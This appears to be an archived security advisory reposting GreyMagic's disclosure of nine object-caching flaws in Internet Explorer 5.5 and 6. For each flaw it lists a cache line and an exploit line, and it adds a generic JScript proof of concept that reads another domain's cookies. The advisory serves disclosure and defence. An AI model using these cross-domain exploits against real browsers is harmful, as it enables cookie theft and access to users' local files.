COMMAND

	Vulnerable cached objects in IE

SYSTEMS AFFECTED

	IE5.5 Win98. IE5.5 NT4. IE6 Win98. IE6 Win2000. IE6 WinXP.
	

	IE 5 SP2 and IE6 SP1 are not vulnerable.

PROBLEM

	In GreyMagic Software Advisory [GM#012-IE] :
	

	 http://security.greymagic.com/adv/gm012-ie/

	

	 Introduction:

	 =============

	

	When communicating between windows, security  checks  ensure  that  both
	pages are in the same security  zone  and  on  the  same  domain.  These
	crucial security checks wrongly assume that certain methods and  objects
	are only going to  be  called  through  their  respective  window.  This
	assumption  enables  some  cached  methods  and   objects   to   provide
	interoperability between otherwise separated documents.
	

	Many security issues arise from storing references to objects  that  are
	supposed  to  be  inaccessible  when  the  page  unloads.  PivX   lately
	disclosed such an issue in the <object> element, which left  a  valid
	reference in its "object" property.
	

	 Discussion:

	 ===========

	

	Through exhaustive  research,  we  discovered  nine  vulnerabilities  in
	Internet  Explorer  involving  object  caching,  most  of  them   highly
	critical.  We're  grouping  all  of  these  vulnerabilities  into   this
	advisory in order to avoid a flood and repetitive statements.
	

	Object caching takes place when the attacker opens a window  to  a  page
	in his own site. The URL in the window is then  changed  to  the  victim
	page, but the cached references stay in place, providing  direct  access
	to the new document.
	

	All  nine  vulnerabilities  are  of  the  same  general  class   (object
	caching). However, each of them is a separate vulnerability, which  uses
	a unique method for exploitation.
	

	Each item in the list below consists of three parts, "Cache"  shows  how
	to cache the vulnerable object, "Exploit" shows  how  the  vulnerability
	works  in  context  and  "Impact"  details  the  implications   of   the
	vulnerability.
	

	"Full access" means access to any page's Document Object  Model  in  any
	domain and any zone. The  implications  include  (but  not  limited  to)
	reading cookies from any domain, forging content  in  any  URL,  reading
	local files and executing arbitrary programs.
	

	1. showModalDialog
	

	Cache: var fVuln=oWin.showModalDialog;

	Exploit - IE 5.5:

	fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");

	Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg"

	vulnerability.

	Impact: Full access in IE5.5, "My Computer" zone access in IE6.

	

	

	2. external
	

	Cache: var oVuln=oWin.external;

	Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");

	Impact: Full access.

	

	

	3. createRange
	

	Cache: var fVuln=oWin.document.selection.createRange;

	Exploit: fVuln().pasteHTML("<img

	src=\"javascript:alert(document.cookie)\">");

	Impact: Full access.

	

	

	4. elementFromPoint
	

	Cache: var fVuln=oWin.document.elementFromPoint;

	Exploit: alert(fVuln(1,1).document.cookie);

	Impact: Full access.

	

	

	5. getElementById
	

	Cache: var fVuln=oWin.document.getElementById;

	Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie);

	Impact: Full access.

	

	

	6. getElementsByName
	

	Cache: var fVuln=oWin.document.getElementsByName;

	Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie);

	Impact: Full access.

	

	

	7. getElementsByTagName
	

	Cache: var fVuln=oWin.document.getElementsByTagName;

	Exploit: alert(fVuln("BODY")[0].document.cookie);

	Impact: Full access.

	

	

	8. execCommand
	

	Cache: var fVuln=oWin.document.execCommand;

	Exploit: fVuln("SelectAll"); fVuln("Copy");

	alert(clipboardData.getData("text"));

	Impact: Read access to the loaded document.

	

	

	9. clipboardData
	

	Cache: var oVuln=oWin.clipboardData;

	Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data");

	Impact: Read/write access to the clipboard, regardless of settings.

	

	

	 Exploit:

	 ========

	

	This generic exploit demonstrates how an attacker may read the  client's
	"google.com" cookie using one of the cached objects above.
	

	<script language="jscript">

	var oWin=open("blank.html","victim","width=100,height=100");

	[Cache line here]

	location.href="http://google.com";

	setTimeout(

	    function () {

	        [Exploit line(s) here]

	    },

	    3000

	);

	</script>

	

	 Demonstration:

	 ==============

	

	We put together a single nine-in-one  proof  of  concept  demonstration,
	which can be found at http://security.greymagic.com/adv/gm012-ie/.

SOLUTION

	Until a patch becomes  available  either  disable  Active  Scripting  or
	upgrade to IE6 SP1.